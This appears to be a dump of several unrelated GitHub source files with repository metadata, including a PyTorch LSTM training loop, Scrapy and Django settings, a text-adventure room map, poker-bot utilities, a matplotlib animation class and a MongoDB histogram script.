model = models.LSTM(size_in=size_in, num_layers=num_layers, size_hidden=size_hidden, size_out=size_out, size_batch=batch_size).to(device)
print(model)
loss_function = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), learning_rate)
input_batch = torch.zeros(seq_length, batch_size, 1, device=device) # Tensor for storing random samples of x
ground_truth_batch = torch.zeros(1, batch_size, 1, device=device) # Tensor for storing the samples of y_gt, which has the same indexes with x.
start_time = time.time() # Start timer
for epoch in range(max_epoch):
#Train Loop
for epoch_index in range(total_samples):
h_state = torch.zeros(num_layers, batch_size, size_hidden, device=device)
c_state = torch.zeros(num_layers, batch_size, size_hidden, device=device)
for batch_index in range(batch_size):
rand_index = random.randint(0, total_samples-1-seq_length) # Generate a random index through x.
input_batch[:, batch_index, 0] = x[rand_index:rand_index+seq_length] # Copy a portion of it that has size of seq_length, to the input_batch.
ground_truth_batch[0, batch_index, 0] = y_gt[rand_index+seq_length] # Do the same thing for y.
out, (h_state, c_state) = model(input_batch, (h_state, c_state))
h_state.detach_()
c_state.detach_()
loss = loss_function(ground_truth_batch, out)
optimizer.zero_grad()
loss.backward()
optimizer.step()
print("TRAIN - Epoch: ", str(epoch), " Iteration: ", str(epoch_index), " Loss: ", str(loss.data))
# Test loop -
if epoch % test_number == 0:
out_buffer = torch.zeros(total_samples)
for iteration_index in range(seq_length, total_samples):
h_state = torch.zeros(num_layers, 1, size_hidden, device=device)
c_state = torch.zeros(num_layers, 1, size_hidden, device=device)
# Take the portion of x (which depends on iteration_index), reshape it so that it can be fed to the LSTM network.
out, (h_state, c_state) = model(x[iteration_index-seq_length+1 : iteration_index+1].view(seq_length, 1, -1), (h_state, c_state))
out_buffer[iteration_index] = out[0,0,0]
loss = loss_function(y_noisy[iteration_index], out) # Calculate loss between y_noisy and output of LSTM.
print("TEST - Epoch: ", str(epoch), " Iteration: ", str(iteration_index), " Loss: ", str(loss.data))
print("Elapsed time:", "{:2f}".format((time.time()-start_time)/60), "minutes since beginning of the training")
plt.plot(x.view(total_samples).cpu().detach(), y_noisy.view(total_samples).cpu().detach())
plt.plot(x.view(total_samples).cpu().detach(), out_buffer.cpu().detach())
plt.show() | [
"noreply@github.com"
] | noreply@github.com |
22d19c5a0f16028c404c69e817457406bc45eb8a | d64bf421ab0fbe21f05bfaae15b2e61ea2aff52b | /scrapping/scrapping/settings.py | c4bc41c28ffdba88f9f8e9a5f486421a948ddd9a | [] | no_license | NicolasGrosjean/GameDataAnalysis | ab782eb1bd8a1fe79385f80b0a2bc06299c03973 | ae0bd79d4069ab566984f68cb5552673b9b37a98 | refs/heads/master | 2020-03-14T07:10:10.835046 | 2018-05-12T12:27:30 | 2018-05-12T12:27:30 | 131,498,757 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,158 | py | # -*- coding: utf-8 -*-
# Scrapy settings for scrapping project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'scrapping'
SPIDER_MODULES = ['scrapping.spiders']
NEWSPIDER_MODULE = 'scrapping.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'scrapping (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'scrapping.middlewares.ScrappingSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'scrapping.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'scrapping.pipelines.ScrappingPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"grosjen@hotmail.fr"
] | grosjen@hotmail.fr |
682b22c2a987a988cd53e2a272352b821fbdd3d1 | 20d688dda05718f40a1c87208ad120521e10deef | /bin/map.py | 320c341d42a663f375a8846838cb38e03db18c27 | [] | no_license | lucasnorman/LPTHW-Final | 32522d5efec43bb80db1bc7587152791e602e788 | 7f2503948e7a29e51f48da8693a90d241cc9e9c9 | refs/heads/master | 2021-07-05T16:07:12.768966 | 2017-10-03T04:18:04 | 2017-10-03T04:18:04 | 105,613,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,219 | py | from random import randint
class RoomError(Exception):
pass
class Room(object):
def __init__(self, name, description):
self.name = name
self.description = description
self.paths = {}
def go(self, direction):
return self.paths.get(direction, None)
def add_paths(self, paths):
self.paths.update(paths)
central_corridor = Room("Central Corridor",
"""
The Gothons of Planet Percal #25 have invaded your ship and destroyed
your entire crew. You are the last surviving member and your last
mission is to get the neutron destruct bomb from the Weapons Armory,
put it in the bridge, and blow the ship up after getting into an
escape pod.
You're running down the central corridor to the Weapons Armory when
a Gothon jumps out, red scaly skin, dark grimy teeth, and evil clown costume
flowing around his hate filled body. He's blocking the door to the
Armory and about to pull a weapon to blast you.
"""
)
laser_weapon_armory = Room("Laser Weapon Armory",
"""
Lucky for you they made you learn Gothon insults in the academy.
You tell the one Gothon joke you know:
Lbhe zbgure vf fb sng, jura fur fvgf nebhaq gur ubhfr, fur fvgf nebhaq gur ubhfr.
The Gothon stops, tries not to laugh, then busts out laughing and can't move.
While he's laughing you run up and shoot him square in the head
putting him down, then jump through the Weapon Armory door.
You do a dive roll into the Weapon Armory, crouch and scan the room
for more Gothons that might be hiding. It's dead quiet, too quiet.
You stand up and run to the far side of the room and find the
neutron bomb in its container. There's a keypad lock on the box
and you need the code to get the bomb out. If you get the code
wrong 10 times then the lock closes forever and you can't
get the bomb. The code is 3 digits.
"""
)
the_bridge = Room("The Bridge",
"""
The container clicks open and the seal breaks, letting gas out.
You grab the neutron bomb and run as fast as you can to the
bridge where you must place it in the right spot.
You burst onto the Bridge with the netron destruct bomb
under your arm and surprise 5 Gothons who are trying to
take control of the ship. Each of them has an even uglier
clown costume than the last. They haven't pulled their
weapons out yet, as they see the active bomb under your
arm and don't want to set it off.
""")
escape_pod = Room("Escape Pod",
"""
You point your blaster at the bomb under your arm
and the Gothons put their hands up and start to sweat.
You inch backward to the door, open it, and then carefully
place the bomb on the floor, pointing your blaster at it.
You then jump back through the door, punch the close button
and blast the lock so the Gothons can't get out.
Now that the bomb is placed you run to the escape pod to
get off this tin can.
You rush through the ship desperately trying to make it to
the escape pod before the whole ship explodes. It seems like
hardly any Gothons are on the ship, so your run is clear of
interference. You get to the chamber with the escape pods, and
now need to pick one to take. Some of them could be damaged
but you don't have time to look. There's 5 pods, which one
do you take?
""")
the_end_winner = Room("The End",
"""
You jump into pod 2 and hit the eject button.
The pod easily slides out into space heading to
the planet below. As it flies to the planet, you look
back and see your ship implode then explode like a
bright star, taking out the Gothon ship at the same
time. You won!
""")
the_end_loser = Room("The End",
"""
You jump into a random pod and hit the eject button.
The pod escapes out into the void of space, then
implodes as the hull ruptures, crushing your body
into jam jelly.
"""
)
generic_death = Room("death", "You died")
escape_pod.add_paths({
'2': the_end_winner,
'*': the_end_loser
})
the_bridge.add_paths({
'throw the bomb': generic_death,
'slowly place the bomb': escape_pod
})
laser_weapon_armory.add_paths({
'0132': the_bridge,
'*': generic_death
})
central_corridor.add_paths({
'shoot!': generic_death,
'dodge!': generic_death,
'tell a joke': laser_weapon_armory
})
START = central_corridor
| [
"lucas.normann@gmail.com"
] | lucas.normann@gmail.com |
e3205ca78ec9c5c4154d6e2bc096e8713b5deffc | 78883afed6f95bc0aae9f48e9d20a4a7c77adb32 | /plugins/secpicam480.py | d9c6855043be61e4c9b27797e8255abed9640c19 | [] | no_license | xe1gyq/speed-camera | f7da04162afaece15033971e23692f5f24a715ed | 71306c058235bf1a7fb00c484c9d34f4ac0fefae | refs/heads/master | 2021-03-30T21:18:50.236194 | 2018-02-26T20:07:13 | 2018-02-26T20:07:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,341 | py | # ---------------- User Configuration Settings for speed-cam.py ---------------------------------
# Ver 8.4 speed-cam.py picam480 Stream Variable Configuration Settings
#######################################
# speed-cam.py plugin settings
#######################################
# Calibration Settings
# --------------------
calibrate = False # Create a calibration image file with calibration hash markers 10 px per mark
# Crop Area for motion detection Tracking
# ---------------------------------------
x_left = 150 # Default= 150 Exclude event if x less than this px position
x_right = 490 # Default= 490 Exclude event if x greater than this px position
y_upper = 140 # Default= 140 Exclude event if y less that this value
y_lower = 340 # Default= 340 Exclude event if y greater than this value
# Motion Event Settings
# ---------------------
SPEED_MPH = False # Set the speed conversion kph=False mph=True
MIN_AREA = 200 # Default= 200 Exclude all contours less than or equal to this sq-px Area
track_len_trig = 75 # Default= 75 Length of track to trigger speed photo
x_diff_max = 18 # Default= 18 Exclude if max px away >= last motion event x pos
x_diff_min = 1 # Default= 1 Exclude if min px away <= last event x pos
track_timeout = 0.0 # Default= 0.0 Optional seconds to wait after track End (Avoid dual tracking)
event_timeout = 0.3 # Default= 0.3 seconds to wait for next motion event before starting new track
log_data_to_CSV = False # Default= False True = Save log data as CSV comma separated values
# Camera Settings
# ---------------
WEBCAM = False # Default= False False=PiCamera True=USB WebCamera
# Pi Camera Settings
# ------------------
CAMERA_WIDTH = 640 # Default= 640 Image stream width for opencv motion scanning default=320
CAMERA_HEIGHT = 480 # Default= 480 Image stream height for opencv motion scanning default=240
CAMERA_FRAMERATE = 20 # Default = 30 Frame rate for video stream V2 picam can be higher
# Camera Image Settings
# ---------------------
image_path = "media/security" # folder name to store images
image_prefix = "scam-" # image name prefix security camera
image_show_motion_area = False # True= Display motion detection rectangle area on saved images
image_filename_speed = False # True= Prefix filename with speed value
image_text_on = False # True= Show Text on speed images False= No Text on images
image_bigger = 1.5 # Default= 1.5 Resize saved speed image by value
image_font_size = 18 # Default= 18 Font text height in px for text on images
imageRecentMax = 10 # 0=off Maintain specified number of most recent files in motionRecentDir
imageRecentDir = "media/recent/security" # default= "media/recent" save recent files directory path
# Optional Manage SubDir Creation by time, number of files or both
# ----------------------------------------------------------------
imageSubDirMaxHours = 0 # 0=off or specify MaxHours - Creates New dated sub-folder if MaxHours exceeded
imageSubDirMaxFiles = 0 # 0=off or specify MaxFiles - Creates New dated sub-folder if MaxFiles exceeded
# ---------------------------------------------- End of User Variables -----------------------------------------------------
| [
"pageauc@gmail.com"
] | pageauc@gmail.com |
d5de700c4c6369346d726ed69705fbfdc92718e2 | 37a8cb73718fc19d37feab4efe05802dfe075c5e | /util/_plot.py | b8b777206addf860fa7846805f2b15fe22ce241d | [
"MIT"
] | permissive | StevenZ315/Optimization-Algorithms | 43f3482766c6937bbfeef44ee1ed2d0ec7703fe9 | f470bfd40242cb9556ae6d64c4bda503970c141d | refs/heads/master | 2022-10-18T11:12:34.375953 | 2020-06-17T05:49:55 | 2020-06-17T05:49:55 | 271,703,817 | 1 | 1 | null | 2020-06-17T05:33:55 | 2020-06-12T03:56:17 | Python | UTF-8 | Python | false | false | 3,032 | py | import matplotlib.pyplot as plt
import matplotlib.animation as animation
import numpy as np
class AnimatedScatter(object):
"""An animated scatter plot using matplotlib.animations.FuncAnimation."""
def __init__(self, data, func=None, title=None, contour=True, resolution=(100, 100)):
self.frames = len(data['solution'])
self.data = data['solution']
self.pbest = data['solution_best']
self.boundary = data['boundary']
# Global optimum if function is provided.
if func:
self.global_opt = func.solution()
# Setup the figure and axes...
self.fig, self.ax = plt.subplots()
self.title = title
# Only add contour when function is provided.
if func and contour:
self.add_contour(func, resolution)
# Then setup FuncAnimation.
self.ani = animation.FuncAnimation(self.fig, self.update, frames=self.frames, interval=500,
init_func=self.setup_plot, blit=True)
def add_contour(self, func, resolution):
xlist = np.linspace(func.boundary()[0][0], func.boundary()[0][1], resolution[0])
ylist = np.linspace(func.boundary()[1][0], func.boundary()[1][1], resolution[1])
# Calculate contour value matrix.
X, Y = np.meshgrid(xlist, ylist)
Z = np.empty(shape=X.shape)
for row in range(Z.shape[0]):
for col in range(Z.shape[1]):
Z[row][col] = func.function((X[row][col], Y[row][col]))
cp = self.ax.contourf(X, Y, Z, cmap='binary', alpha=0.7)
self.fig.colorbar(cp)
def setup_plot(self):
"""Initial drawing of the scatter plot."""
# Current generation points.
x = [point[0] for point in self.data[0]]
y = [point[1] for point in self.data[0]]
self.scatter = self.ax.scatter(x, y, marker='.', c='blue', alpha=0.5)
# Current optimal solution.
self.center = self.ax.scatter(self.pbest[0][0], self.pbest[0][1], marker='^', c='red')
# Global optimum solution. (Benchmark)
# x_opt = [point[0] for point in self.global_opt]
# y_opt = [point[1] for point in self.global_opt]
# self.opt = self.ax.scatter(x_opt, y_opt, marker='o', c='green')
# Axis settings.
self.ax.set_title(self.title)
self.ax.set_xlim(self.boundary[0])
self.ax.set_ylim(self.boundary[1])
self.ax.set_xlabel("Iteration: 0")
# For FuncAnimation's sake, we need to return the artist we'll be using
# Note that it expects a sequence of artists, thus the trailing comma.
return self.scatter,
def update(self, i):
"""Update the scatter plot."""
self.scatter.set_offsets(self.data[i])
self.center.set_offsets(self.pbest[i])
self.ax.set_xlabel("Iteration: %d" % (i + 1))
return self.scatter,
def save(self, path):
self.ani.save(path)
if __name__ == '__main__':
a = AnimatedScatter()
plt.show() | [
"60725360+StevenZ315@users.noreply.github.com"
] | 60725360+StevenZ315@users.noreply.github.com |
0cccc8e1b758dacc3f7b7e91e84134b790b30861 | 9d39abfcb87440cdbaf33a6503587bcc884647e2 | /Lesson_5/hh_parse/hh_parse/spiders/loaders.py | c81f7304dcb93f0eef6ae0ea57ec9aad8eb3b265 | [] | no_license | mik-79-ekb/Datamining | 7a100c7b004aff92a71a97a5c3758fda189502f7 | de345349a31baae17b51eaff001f144906dcaa48 | refs/heads/main | 2023-06-12T02:43:36.865026 | 2021-07-09T09:42:53 | 2021-07-09T09:42:53 | 369,628,774 | 0 | 0 | null | 2021-07-09T09:42:54 | 2021-05-21T18:58:01 | Python | UTF-8 | Python | false | false | 1,241 | py | from scrapy.loader import ItemLoader
from itemloaders.processors import TakeFirst, MapCompose
from .processors import flat_text, hh_user_url, hh_sphere_activities_clean, concatenate_items
class HHVacancyLoader(ItemLoader):
default_item_class = dict
item_type_out = TakeFirst()
url_out = TakeFirst()
title_out = TakeFirst()
salary_out = flat_text
description_out = flat_text
author_in = MapCompose(hh_user_url)
author_out = TakeFirst()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.context.get("response"):
self.add_value("url", self.context["response"].url)
self.add_value("item_type", "vacancy")
class HHCompanyLoader(ItemLoader):
default_item_class = dict
item_type_out = TakeFirst()
url_out = TakeFirst()
company_name_in = concatenate_items
company_name_out = TakeFirst()
company_site_out = TakeFirst()
sphere_activities_in = MapCompose(hh_sphere_activities_clean)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.context.get("response"):
self.add_value("url", self.context["response"].url)
self.add_value("item_type", "company") | [
"2068811@gmail.com"
] | 2068811@gmail.com |
cde20cb3464818d38c4f964502b21319c010bad4 | 2c872fedcdc12c89742d10c2f1c821eed0470726 | /pbase/day09/code/text_args.py | bf20be1ef127a5651f828ffc51ef6a1001634dcd | [] | no_license | zuigehulu/AID1811 | 581c3c7a37df9fa928bc632e4891fc9bafe69201 | 10cab0869875290646a9e5d815ff159d0116990e | refs/heads/master | 2020-04-19T16:33:04.174841 | 2019-01-30T07:58:24 | 2019-01-30T07:58:24 | 168,307,918 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | def mysum(*args):
return sum(args)
print(mysum(1,2))
print(mysum(1,2,3,4))
print(mysum(1,2,3,4,5,6,7,8))
| [
"442315617@qq.com"
] | 442315617@qq.com |
42757135dc0556c81a651638ff62924bd270bc0c | 497c6810f06f1b4a5ceadec53dbf59371b709b18 | /main_files/holdem/utilities.py | e43415864ccc64db521cd606d48787f53ac9320f | [] | no_license | HorstBoy/MLFYP_Project | 92e72e8f3ea9da1908c1d034fce0cee940ee0424 | cfd60c70e4a16d697e14af9947a33b01cf540cf9 | refs/heads/master | 2023-08-06T05:30:19.926049 | 2021-08-14T00:06:25 | 2021-08-14T00:06:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,564 | py | from include import *
def which_round(community_cards):
count_cards = 0
_round = ''
for i in community_cards:
if not i == -1:
count_cards = count_cards + 1
if count_cards == 0:
_round = 'Preflop'
elif count_cards == 3:
_round = 'Flop'
elif count_cards == 4:
_round = 'Turn'
elif count_cards == 5:
_round = 'River'
return _round
def fill_range_structure(_round, player):
range_structure = None
if _round == 'Preflop':
range_structure = preflop_range
elif _round == 'Flop':
range_structure = hand_strength_flop
elif _round == 'Turn':
range_structure = hand_strength_turn
elif _round == 'River':
range_structure = hand_strength_river
return range_structure
def set_attributes(hand_strength, evaluation, player, rc, score_desc, event):
if event == 'Preflop':
if player.evaluation_preflop["he"] == '':
player.evaluation_preflop["hand_strength"] = hand_strength
player.evaluation_preflop["he"] = player.he
player.evaluation_preflop["rc"] = rc
player.evaluation_preflop["score_desc"] = score_desc
player.evaluation_preflop["evaluation"] = evaluation
elif event == 'Flop':
if player.evaluation_flop["he"] == '':
player.evaluation_flop["hand_strength"] = hand_strength
player.evaluation_flop["he"] = player.he
player.evaluation_flop["rc"] = rc
player.evaluation_flop["score_desc"] = score_desc
player.evaluation_flop["evaluation"] = evaluation
elif event == 'Turn':
if player.evaluation_turn["he"] == '':
player.evaluation_turn["hand_strength"] = hand_strength
player.evaluation_turn["he"] = player.he
player.evaluation_turn["rc"] = rc
player.evaluation_turn["score_desc"] = score_desc
player.evaluation_turn["evaluation"] = evaluation
elif event == 'River':
if player.evaluation_river["he"] == '':
player.evaluation_river["hand_strength"] = hand_strength
player.evaluation_river["he"] = player.he
player.evaluation_river["rc"] = rc
player.evaluation_river["score_desc"] = score_desc
player.evaluation_river["evaluation"] = evaluation
def highest_in_LR(player_o, env):
highest_lr_bot = 0
highest_lr_value = 0
for key, value in env.level_raises.items():
if value > highest_lr_value:
highest_lr_value = value
highest_lr_bot = key
return highest_lr_value, highest_lr_bot
def calc_raises_i_face(player_o, env):
bot_position_num = player_o.get_seat()
my_lr_value = env.level_raises[bot_position_num]
highest_lr_value, highest_lr_bot = highest_in_LR(player_o, env)
add_me = highest_lr_value - my_lr_value
return player_o.round['raises_i_owe'] + add_me
def assign_evals_player(player_o, _round, env):
hand_strength, evaluation, rc, score_desc, hand, board = player_o.he.get_evaluation(_round)
set_attributes(hand_strength, evaluation, player_o, rc, score_desc, _round)
player_o.populatePlayerPossibleMoves(env)
player_o.round['raises_i_owe'] = calc_raises_i_face(player_o, env)
# print("")
def do_necessary_env_cleanup(env):
is_end_game = False
list_players = env._player_dict.copy()
is_end_game = None
for player in list_players.values():
if player.stack <= 0:
env.remove_player(player.get_seat())
is_end_game = True # End Game
env.assign_positions()
return is_end_game
def convert_list_to_tupleA(learner_bot_state, community_state):
info = [tuple(p) for p in learner_bot_state]
info = tuple(info[0]+info[1])
community = [tuple(p) for p in community_state]
community = tuple(community[0]+community[1])
states_in_episode = info + community
return states_in_episode
class action_table:
CHECK = 0
CALL = 1
RAISE = 2
FOLD = 3
NA = 0
def convert_step_return_to_action(action_from_step):
if action_from_step[0] == 'call' or action_from_step[0] == 'check':
return 0
elif action_from_step[0] == 'raise' or action_from_step[0] == 'bet':
return 1
else:
return 2
def safe_actions_call_bot(community_infos, villain_choice, n_seats):
current_player = community_infos[-3]
to_call = community_infos[-1]
actions = [[action_table.CHECK, action_table.NA]] * n_seats
if to_call > 0:
if villain_choice is None:
actions[current_player] = [action_table.CALL, action_table.NA]
else:
actions[current_player] = [villain_choice[0], villain_choice[1]]
return actions
def compress_bucket(state, env, pre=False):
if pre:
state[0][0][0][0] = round((state[0][0][0][0]/env.starting_stack_size) * (state[0][0][0][0]/100))
if state[0][0][0][1] != -1:
state[0][0][0][1] = round((state[0][0][0][1]/7462) * (16900/100))
else:
for i in range(0,3,2):
state[i][0][0] = round((state[i][0][0]/env.starting_stack_size) * (state[i][0][0]/100))
if state[i][0][1] != -1:
state[i][0][1] = round((state[i][0][1]/7462) * (16900/100))
return state
def convert_step_return_to_set(sar):
player_features_tuples = []
player_cards_tuples = []
community_state_tuples = []
pf = sar[0][0][0][0]
player_features = tuple(pf)
player_features_tuples.append(player_features)
pf = sar[0][0][0][1]
player_cards = tuple(pf)
player_cards_tuples.append(player_cards)
pf = sar[0][1][0]
community_state = tuple(pf)
community_state_tuples.append(community_state)
# states_in_episode = list(set([sar[0] for sar in episode])) # sar--> state,action,reward
states = []
for i in range(len(player_features_tuples)):
my_tup = (player_features_tuples[i] + player_cards_tuples[i] + community_state_tuples[i])
states.append(my_tup)
return states
| [
"garyjh126@gmail.com"
] | garyjh126@gmail.com |
eb1d56fce359772a0815850648aed190af310eb2 | 7c61922c2de52ea684a39a002355eff6551bf930 | /getcount.py | 33de2b911f0d1b8b0652e5e8f9650e44c86dcae2 | [] | no_license | DongDong-123/codewars | ac3e6b5d5dab78ef60140ac87b9c02cc8dba646c | 723750fed649ea763a2363604dd6dea3359216a8 | refs/heads/master | 2020-03-21T15:48:19.316417 | 2019-01-04T14:44:54 | 2019-01-04T14:44:54 | 138,733,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | def getCount(inputStr):
#num_vowels = 0
inputStr = inputStr.lower()
vowels = ['a','e','i','o','u']
b = []
for i in inputStr:
b.append(i)
for j in b and vowels:
num_vowels = inputStr.count(i)
return num_vowels
#inputStr = "abracadabra"
a = getCount("abracadabra")
print(a)
| [
"zisehaiyang04@163.com"
] | zisehaiyang04@163.com |
0243ff78399d38a3045a581bfcc42a1089a3428b | 8df1516bcfdcf5247058ceaaeccfc0253fecd8a9 | /mysite/settings.py | 98882cb31cf2a124b71a58e890ef1a4cdd85ae8f | [] | no_license | noorhashem/DjangoBlog | 16fd3c768bb97a1c0ddfc11d4a938c4eefa81a8c | 546c7423480d1bb8b63299b619bf783135043953 | refs/heads/master | 2022-03-22T15:11:06.467269 | 2019-11-20T14:39:14 | 2019-11-20T14:39:14 | 222,958,751 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,195 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*w*uua%kq^z8e*4=cwf6ym86#=hl8icz$pkwfsd+)6e5(-e=m6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog.apps.BlogConfig'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'EET'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"nour.hashem95@gmail.com"
] | nour.hashem95@gmail.com |
5b94b6c1bf6f6eeb1e1c275c7214f237e6677589 | 05ad72ac66cfa8afa94b68002751cb9bc0cf4b7c | /manage.py | cb4d929db7c1f566d31be824390f38d864a4efca | [] | no_license | fibodude/fibonache | 4c723dbba87a275c7e183571706c6a39b7ed5ad2 | 67b64804e802f08202181df4360cee2d89fbc268 | refs/heads/master | 2020-06-12T10:50:33.960135 | 2016-12-05T03:53:13 | 2016-12-05T03:53:13 | 75,587,022 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "fibonache.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"email@mail.com"
] | email@mail.com |
10ea113a04936eea9ac52168ce39061c93348f1b | 54dd9dc1ae1ab2013bcf9fc9c32c6623c55f1b3c | /patch_level_features/create_object_level_histogram_old.py | 59df1b3dcb93570d694ff928eefbe174eda9de62 | [] | no_license | liuwenhaha/SEER_distro | 27f74126cfa0f9f044c1cf5a5fdfd61b76145f59 | b5027c69808eb64724bcc9acd5e29ae2f4ab470c | refs/heads/master | 2020-08-26T11:27:56.622419 | 2019-08-13T16:54:54 | 2019-08-13T16:54:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,415 | py | import matplotlib.pyplot as plt
plt.switch_backend('agg')
import matplotlib.patches as patches
import matplotlib.path as path
import numpy as np
import collections
import sys
import os
import json
import datetime
from pymongo import MongoClient
if __name__ == '__main__':
if len(sys.argv)<0:
print "usage:python create_object_level_histogram.py";
exit();
#my_home="/data1/bwang"
my_home="/home/bwang/patch_level";
picture_folder = os.path.join(my_home, 'object_level_plot');
if not os.path.exists(picture_folder):
print '%s folder do not exist, then create it.' % picture_folder;
os.makedirs(picture_folder);
print " --- read config.json file ---" ;
config_json_file_name = "config_cluster.json";
config_json_file = os.path.join(my_home, config_json_file_name);
with open(config_json_file) as json_data:
d = json.load(json_data);
patch_size = d['patch_size'];
db_host = d['db_host'];
db_port = d['db_port'];
db_name1 = d['db_name1'];
db_name2 = d['db_name2'];
print patch_size,db_host,db_port,db_name1,db_name2;
client = MongoClient('mongodb://'+db_host+':'+db_port+'/');
db2 = client[db_name2];
features_histogram = db2.features_histogram;
for record in features_histogram.find({'data_range':'object_level'},{"_id":0,"date":0,"data_range":0}):
case_id=record["case_id"];
feature=record["feature"];
